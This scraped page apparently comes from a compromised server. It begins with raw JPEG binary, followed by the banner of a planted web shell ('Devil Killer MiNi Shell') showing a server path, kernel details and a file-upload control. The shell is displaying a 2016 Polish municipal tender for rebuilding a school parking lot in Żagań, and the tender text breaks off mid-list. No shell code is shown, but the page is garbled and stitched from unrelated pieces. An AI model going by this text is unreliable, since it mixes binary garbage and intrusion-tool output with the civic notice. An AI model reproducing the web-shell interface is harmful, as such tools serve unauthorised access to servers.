JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160727/161315-N-2016.html

<p class="kh_header"><b>Żagań: PRZEBUDOWA PARKINGU PRZY ULICY ŻARSKIEJ (przy Zespole Szkół nr 1)  W ŻAGANIU</b><br>
<b>Numer ogłoszenia: 161315 - 2016; data zamieszczenia: 27.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 68 4771040, faks 68 4771017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA PARKINGU PRZY ULICY ŻARSKIEJ (przy Zespole Szkół nr 1)  W ŻAGANIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest przebudowa parkingu przy ulicy Żarskiej w Żaganiu pomiędzy Zespołem Szkół nr 1, a ulicą Żarską, umiejscowionego na działce o numerze ew. 1739/4, z przebudową istniejącego zjazdu i dobudową nowego zjazdu od ulicy Żarskiej (działka nr 1735/1). Działki stanowią własność Gminy Żagań o statusie miejskim. Obecny stan parkingu i zjazdu nie odpowiada wymaganiom wynikającym z ich przeznaczenia. Na terenie objętym zadaniem inwestycyjnym obecnie zagospodarowanych jest 7 miejsc parkingowych z drogą dojazdową na zaplecze szkoły. Obecna nawierzchnia parkingu to nawierzchnia z kostki betonowej, a droga dojazdowa z asfaltu. Planowana inwestycja to rozbudowa parkingu na 22 stanowisk w tym dwa stanowiska dla osób niepełnosprawnych, z przebudową dróg dojazdowych i ciągów pieszych. 3.2. Zakres przewidywanych robót obejmuje: 1. Rozbiórkę istniejącej nawierzchni bitumicznej zjazdu i jezdni manewrowej. 2. Rozbiórkę istniejących krawężników i obrzeży betonowych. 3. Rozbiórkę istniejącej nawierzchni miejsc postojowych z kostki betonowej. 4. Wycinkę drzew i krzewów. 5. Zmianę lokalizacji słupa oświetleniowego. 6. Wyprofilowanie terenu. 7. Wykonanie koryta nowej części. 8. Mechaniczne zagęszczanie podłoża. 9. Wykonanie podbudowy z kruszywa łamanego. 10. Niwelację studni telekomunikacyjnych. 11. Przebudowę zjazdów. 12. Wykonanie odprowadzenia wody deszczowej. 13. Wykonanie nawierzchni parkingu, dróg dojazdowych wraz z przebudową chodnika. 14. Nasadzenia zieleni. 15. Zmianę organizacji ruchu. Zakres przewidywanych robót w szczególności obejmuje: 1. Roboty rozbiórkowe i ziemne: - Rozebranie starych nawierzchni bitumicznych zjazdu i jezdni manewrowej, - Rozebranie nawierzchni z kostki betonowej miejsc postojowych i chodnika, - Likwidacja ciągów komunikacyjnych wraz z krawężnikami i obrzeżami - Wycinka drzew i krzewów wraz z karczowaniem z wywiezieniem dłużyc w miejsce wskazane przez Inwestora. - Wykonanie koryta, pomiary geodezyjne i niwelacja terenu pod nową nawierzchnię parkingu i jezdni, - Wywiezienie gruzu, gałęzi, krzewów i ich utylizacja (do wglądu Inwestora kwit dot. utylizacji gruzu bitumicznego). 2. Zmiana lokalizacji istniejącego słupa oświetleniowego (przesunięcie kolidującego słupa poza obręb projektowanego utwardzenia na odległości 0,5 m od krawędzi jezdni). 3. Regulacje istniejących studzienek i niwelacja pokrywy studni telekomunikacyjnej do projektowanych rzędnych terenu oraz wymiana ramy i pokrywy na typ ciężki . 4. Zabezpieczenie istniejącego kabla telekomunikacyjnego rurą osłonową dwudzielną fi 160mm. 5. Roboty ziemne (wykopy, składowanie, profilowanie, dogęszczanie podłoży). 6. Wykonanie kanalizacji deszczowej (2 szt. wpusty uliczne ze studzienkami ściekowymi, studnia rewizyjna 1szt., skrzynki rozsączające ok.6m3). 7. Przebudowa istniejącego i budowa nowego zjazdu z parkingu na drogę publiczną przy ul. Żarskiej. Zjazdy będą obsługiwać ruch jednokierunkowy. Nawierzchnia zjazdów wykonana będzie z kostki betonowej czerwonej gr. 8 cm na podsypce z miału kamiennego frakcji 0-4mm gr. 5 cm, na podbudowie z kruszywa łamanego frakcji 0-31,5 mm gr. 20 cm. 8. Montaż krawężników betonowych stojących 15x30cm, leżących 15x22 cm i ukośnych 15x22-30cm na ławach betonowych z betonu C12/15 gr. 15cm z oporem gr. 15cm i obrzeży betonowych 8x30cm na ławach betonowych z betonu C12/15 gr. min.10cm. 9. Wykonanie nawierzchni placu parkingowego i drogi manewrowej z kostki betonowej gr. 8cm na podsypce z miału kamiennego frakcji 0-4mm gr. 5 cm i podbudowie z kruszywa łamanego 0-31,5mm gr. 20cm. 10. Wykonanie wyniesienia przejścia dla pieszych - próg zwalniający o wym. 5,0 x 6,0 m wykonany z kostki betonowej czerwonej. 11. Odwodnienie - zjazdy oraz jezdnia manewrowa odwodniona zostanie powierzchniowo poprzez odpowiednie wykonanie spadków podłużnych i poprzecznych i odprowadzona do projektowanych wpustów. Woda w granicach pasa drogowego zostanie odprowadzona do istniejących wpustów ulicznych. 12. Zmiana organizacji ruchu: oznakowanie poziome, pionowe jezdni, parkingu i ciągu pieszo rowerowego. Do oznakowania należy zastosować znaki małe o licach zabezpieczonych folia odblaskową typu 1 lub folią pryzmatyczną. 13. Nawiezienie ziemi urodzajnej, wysiew traw i nasadzenia niskiej roślinności. 14. Nasadzenia drzew (o obwodzie min. 15 cm) wg planu nasadzeń zastępczych (7 szt.) 15. Obsługa geodezyjna. 16. Sporządzenie dokumentacji powykonawczej (mapy, tabelaryczna inwentaryzacja powykonawcza). ZESTAWIENIE LICZBOWE 1. Rozbiórki: a) Nawierzchnia bitumiczna (zjazd, jezdnia) - 131 m2 b) Nawierzchnia z kostki betonowej - 196 m2 c) Krawężniki betonowe - 130 mb d) Obrzeża betonowe - 140 mb e) Drzewa do wycinki - 14 szt. 2. Budowa : a) Zjazdy z kostki betonowej (czerwona) - 2szt. - pow. ok. 120 m2 b) Jezdnia manewrowa z kostki betonowej szarej - 360 m2 c) Miejsca postojowe z kostki betonowej czarnej-grafitowej (20szt. x 5,00x2,50) - 250 m2 d) Miejsca postojowe z kostki niebieskiej (2sz. 5,00x 3,60) - 36 m2 e) Chodniki z kostki betonowej szarej - 190 m2 f) Przejście dla pieszych (próg zwalniający) - 30 m2 g) Zagospodarowanie zieleni (humusowanie, nasadzanie, dosiew trawy) - ok. 280 m2 h) Przebudowa istniejącego chodnika z wykorzystaniem rozbiórkowej kostki betonowej - 106 m2 i) Krawężniki betonowe 15 x 30 cm - 205 mb j) Krawężniki betonowe 15x 22cm - 160 mb k) Obrzeża betonowe - 8x 30 cm - 150 mb 3. Prace instalacyjne i dodatkowe: a) Zmiana lokalizacji słupa oświetleniowego ( 1 szt. o odległ. ok. 1,5 m) b) Niwelacja studni telekomunikacyjnej (szt. 1) z wymianą pokrywy na typ ciężki c) Zabezpieczenie istniejącego kabla rurą osłonową dwudzielną fi 160mm d) Wykonanie odprowadzenia wód deszczowych (dwa wpusty uliczne, studzienka rewizyjna, skrzynki rozsączające) e) Wprowadzenie nowej organizacji ruchu f) Nasadzenia drzew (7szt.), krzewów i innej niskiej roślinności. Uzgodnienia branżowe : 1. LWKZ Wojewódzki Urząd Ochrony Zabytków w Zielonej Górze - otoczenie objęte ochrona konserwatorską. 2. ŻWiK sp. z o.o. w Żaganiu - sieć wodno-kanalizacyjna 3. ENEA Rejon Oświetleniowy w Zielonej Górze - sieć energetyczna 4. Polska Spółka Gazownicza sp. z o.o. - sieć gazowa 5. Gmina Żagań o st. miejskim (zarządca drogi gminnej) - zjazd z drogi publicznej 3.3. Szczegółowy opis i zakres przedmiotu zamówienia zawiera dokumentacja projektowa na którą składa się : projekt budowalny - branża drogowa, Projekt budowlany - branża sanitarna, specyfikacja techniczna, Plan BIOZ, projekt stałej organizacji ruchu, projekt czasowej organizacji ruchu, stanowiąca integralną część Specyfikacji Istotnych Warunków Zamówienia. 3.4. Dodatkowej informacje niezbędne do wykonania przedmiotu zamówienia: 1. W ramach przedmiotu zamówienia wykonawca zobowiązany jest wywieźć odpady budowlane i gruz oraz dokonać ich utylizacji. 2. Wykonawca zobowiązany jest do przekazania zamawiającemu elementów z demontażu i rozbiórek, przedstawiających w ocenie zamawiającego wartość użytkową, ich załadunku, transportu i rozładunku na własny koszt na miejsce wskazane przez zamawiającego na terenie miasta Żagań. 3. Przed zakupem materiałów budowlanych (kostka brukowa ), drzew i nasadzeń wykonawca zobowiązany jest uzyskać akceptację zamawiającego w zakresie ich rodzaju, kolorystyki i wzornictwa. 4. Wykonawca jest zobowiązany do zawiadamiania z co najmniej 7-dniowym wyprzedzeniem właścicieli lub użytkowników nieruchomości przyległych do terenu budowy o ewentualnym braku możliwości dojazdu do tych nieruchomości i jego czasookresie. 5. W przypadku, gdy dokumentacja projektowa lub specyfikacja techniczna wykonania i odbioru robót nie podają w sposób szczegółowy technologii wykonywania robót lub wykonania określonego elementu przedmiotu zamówienia, bądź też nie precyzują dostatecznie rodzaju i standardu materiałów, wykonawca zobowiązany jest do każdorazowego wcześniejszego uzyskania decyzji w tym zakresie od zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.22.33.00-9, 45.23.32.26-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1. Zamawiający  żąda od Wykonawców wniesienia wadium.

8.2. Wadium  w wysokości 8 400,00 zł, słownie: osiem tysięcy czterysta złotych i 00/100  należy wnieść przed upływem terminu składania ofert. 

8.3. Wadium należy wnieść w jednej z niżej  wymienionych  form: 
1)  pieniądzu; 
2)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo-  
     kredytowej, z tym że poręczenie kasy jest zawsze  poręczeniem pieniężnym; 
3)  gwarancjach bankowych; 
4)  gwarancjach ubezpieczeniowych; 
5)  poręczeniach udzielanych przez podmioty, o których mowa w art.6b  ust.5 pkt  2 ustawy z 
     dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju  Przedsiębiorczości (Dz.U.   
     Nr 109, poz.1158, z późn.zm). 

8.4. Wadium wnoszone w  pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego nr BZ WBK S.A. I O/ Żagań 39 1090 2558 0000 0006 4000 0101   i  przechowuje się na tym rachunku. 

8.5. Wadium wniesione w pieniądzu uznaje się za wniesione w sposób prawidłowy, gdy kwota wadium zostanie zaksięgowana  na wskazanym koncie  Zamawiającego nie później, jak przed upływem terminu składania ofert. 
Kopię  dowodu wpłaty wadium  Wykonawca dołącza do oferty. 

8.6. Dokument potwierdzający wniesienie wadium  w innej formie niż w pieniądzu winien być 
złożony w oryginale (odrębnie poza ofertą)  przed terminem składania ofert.

8.7. Wykonawca, którego  oferta nie będzie zabezpieczona wadium wniesionym we właściwej formie, terminie i kwocie zostanie wykluczony z przedmiotowego  postępowania.

8.8. Zamawiający zwraca  wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. 

8.9. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zwraca się  wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.  

8.10. Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który  wycofał ofertę przed upływem terminu składania ofert. 

8.11. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami  wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.  

8.12. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu  Zwrócono wadium na podstawie  pkt  8.8 SIWZ, jeżeli w wyniku  rozstrzygnięcia  odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca  wnosi  wadium w terminie  określonym przez Zamawiającego.

8.13. Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca w odpowiedzi na  wezwanie, o którym mowa w  art.26 ust.3 ustawy Prawo zamówień publicznych, z przyczyn leżących po jego stronie,   nie złożył  dokumentów lub  oświadczeń o którym mowa w art. 25 ust.1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt.5 ustawy Pzp, lub informacji o tym, ze nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt.3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej

8.14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana : 
1)  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 

2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 

3)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w  zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania określonej 
     działalności lub czynności, Zamawiający nie żąda od Wykonawcy  potwierdzenia   
     posiadania uprawnień do wykonywania działalności typu koncesja, zezwolenie, licencja,
     gdyż przepisy prawa nie nakładają obowiązku posiadania  takowych uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2) w zakresie  posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten 
    wymóg Wykonawcę,  który w okresie ostatnich  pięciu lat przed upływem składania ofert , 
    a jeżeli okres prowadzenia  działalności jest krótszy- w tym okresie :  
    - wykonał co najmniej dwie  roboty budowlane odpowiadające swoim zakresem i wartością 
      robotom stanowiącym przedmiot zamówienia, polegające  na budowie/przebudowie/ 
      rozbudowie  drogi lub parkingu o nawierzchni z kostki brukowej betonowej,  o 
      powierzchni nie mniejszej niż  500 m2  i wartości nie mniejszej niż 120 000, 00 zł.  brutto.     
      Na potwierdzenie spełnienia  warunku w zakresie wiedzy i doświadczenia  Wykonawca 
      złoży wraz z ofertą dokument określony w punkcie 6.1  podpunkt 2 SIWZ,  wraz z 
      wymaganymi poświadczeniami. 
      Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.    
      Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od   
      charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji 
      obowiązany jest udowodnić Zamawiającemu iż będzie dysponował tymi  zasobami  w 
      trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu  :  pisemne 
      zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na 
      potrzeby  wykonania zamówienia, w jakim zakresie i na jaki okres oddaje  mu zasoby  
      oraz  składając dokumenty dotyczące tego podmiotu określone w punkcie  6.2 SIWZ.  
      Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z 
      wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów 
     przy realizacji zamówienia, chyba że za  nieudostępnienie zasobów nie ponosi  winy;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3) w zakresie dysponowania  osobami zdolnymi  do wykonania zamówienia, Zamawiający 
    uzna za spełniającego te wymogi  tego Wykonawcę, który będzie dysponował osobami  
    posiadającymi uprawnienia niezbędne do wykonania zamówienia, a mianowicie:    
    - uprawnienia do kierowania  robotami budowlanymi w specjalności drogowej oraz w 
      specjalności instalacyjnej  w zakresie sieci kanalizacyjnej  lub innymi uprawnieniami 
      umożliwiającymi wykonywanie tych  samych   czynności, do wykonywania których 
      uprawniają w aktualnym stanie prawnym  uprawnienia w w/w specjalnościach.     
    Na potwierdzenie spełnienia wszystkich warunków określonych w punkcie 5.5. podpunkt 3  
    Wykonawca złoży wraz z ofertą   dokument   (wykaz) określony w  punkcie 6.1 podpunkt 3 
    SIWZ. Dokument musi zawierać  wszystkie żądane przez Zamawiającego informacje.  
    Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie. 
    W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca 
    może polegać na potencjale innych podmiotów, niezależnie od charakteru prawnego 
    łączących go z nimi stosunków.  Wykonawca w takiej sytuacji obowiązany jest udowodnić   
    Zamawiającemu, iż będzie dysponował tymi  zasobami  w trakcie realizacji zamówienia, w   
    szczególności przedstawiając w tym celu  pisemne zobowiązanie tych podmiotów do 
    oddania mu do dyspozycji niezbędnych zasobów na potrzeby  wykonania zamówienia,  w 
    jakim zakresie i na jaki okres oddaje mu zasoby  oraz składając dokumenty dotyczące     
    tego podmiotu określone w punkcie 6.2 SIWZ. 
    Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z
    wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów 
    (i w tym zakresie składa stosowne oświadczenie ), chyba że za  nieudostępnienie 
    zasobów nie ponosi  winy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4) w zakresie sytuacji ekonomicznej i finansowej,   Zamawiający  żąda aby Wykonawca  
    znajdował się w sytuacji finansowej zapewniającej wykonanie zamówienia  i posiadał  
    środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 100 000,00 zł. 
    Wykonawca może polegać na potencjale innych podmiotów, niezależnie od charakteru 
    prawnego łączących go z nimi stosunków.  Wykonawca w takiej sytuacji obowiązany jest
    udowodnić    Zamawiającemu, iż będzie dysponował tymi  zasobami  w trakcie realizacji 
    zamówienia, w    szczególności przedstawiając w tym celu  pisemne zobowiązanie tych 
    podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby  wykonania 
    zamówienia,  w jakim zakresie i na jaki okres oddaje mu zasoby  oraz składając    
    dokumenty dotyczące tego podmiotu określone w punkcie 6.2 SIWZ. 
    Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z 
    wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów 
    (i w tym zakresie składa stosowne oświadczenie ), chyba że za  nieudostępnienie    
    zasobów nie ponosi  winy.
    Na potwierdzenie spełnienia tego warunku Wykonawca złoży dokument określony w 
    punkcie 6.1 podpunkt 5.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obowiązek wykazania i złożenia poświadczeń o należytym  bądź nienależytym wykonaniu 
    zamówień wymienionych w wykazie, dotyczy najważniejszych robót, określonych
    w punkcie 5.5 podpunkt  2 SIWZ : co najmniej  dwie roboty budowalne  odpowiadające 
    swoim zakresem i wartością robotom stanowiącym przedmiot zamówienia, polegające  na 
    budowie/ przebudowie/ rozbudowie  drogi lub parkingu o nawierzchni z kostki brukowej
    betonowej,  o powierzchni nie mniejszej jak 500 m2  i wartości nie mniejszej jak 120 000 zł 
    brutto;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

